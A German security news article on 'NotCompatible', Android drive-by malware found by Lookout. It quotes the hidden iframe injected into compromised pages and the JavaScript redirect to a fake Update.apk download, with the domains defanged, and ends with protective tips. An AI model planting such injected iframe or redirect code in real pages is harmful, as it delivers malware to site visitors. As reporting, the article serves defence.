Der Sicherheitsdienstleister Lookout hat nun erste Drive-by-Malware für Android Systeme entdeckt. Wenn der Anwender mit seinem Android-Smartphone eine kompromittierte Webseite besucht, wird die Malware automatisch im Hintergrund heruntergeladen (Drive-by-Download). Ist der Download abgeschlossen, erscheint ein Hinweis, die “App” bzw. die vermeintliche Malware zu installieren. Hierfür muss für die Installation “Unbekannte Quellen” eingestellt sein. Ist das nicht der Fall, wird die Installation geblockt.
Die infizierten Webseiten beinhalten beispielsweise den folgenden Code am Fuß der Seite:
[code lang=”html”]<iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>[/code]Wenn ein Browser eines PCs die Seite gaoanalitics.info aufruft, bekommt der Anwender eine Fehlermeldung (File not found). Besucht jedoch Android-System mit dem Wort Android in seinem User-Agent-Header die Seite, wird folgendes zurückgegeben:
[code lang=”html”]<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>[/code]Hierdurch wird sofort die Seite androidonlinefix.info aufgerufen. Wie bei der Seite davor, starten nur die Browser einen Download der Anwendung, die im User Agent Android mitführen.
Bild von Lookout: Ursprünglich von redditor, Georgiabiker
Die heruntergeladenen Malware wird “NotCompatible” genannt. Sie tarnt sich unter dem Namen Update.apk als Sicherheitsupdate. Ist die Malware einmal installiert, verwandelt sich das System in einen Proxy der zum Eindringen in Unternehmen und Behörden verwendet werden kann.
Und so schützen Sie Ihr Smartphone:
Wenn sie den Browser Firefox nutzen, können Sie sich das Add-on QuickJS installieren. Dieses können Sie so einstellen, dass es Javascript blockt. Weitere Infos zu disem Add-on finden Sie in diesem Artikel.
Unser Tipp: Aktivieren Sie JavaScript nur da, wo es unbedingt nötig ist. Halten Sie Ihren Browser aktuell.
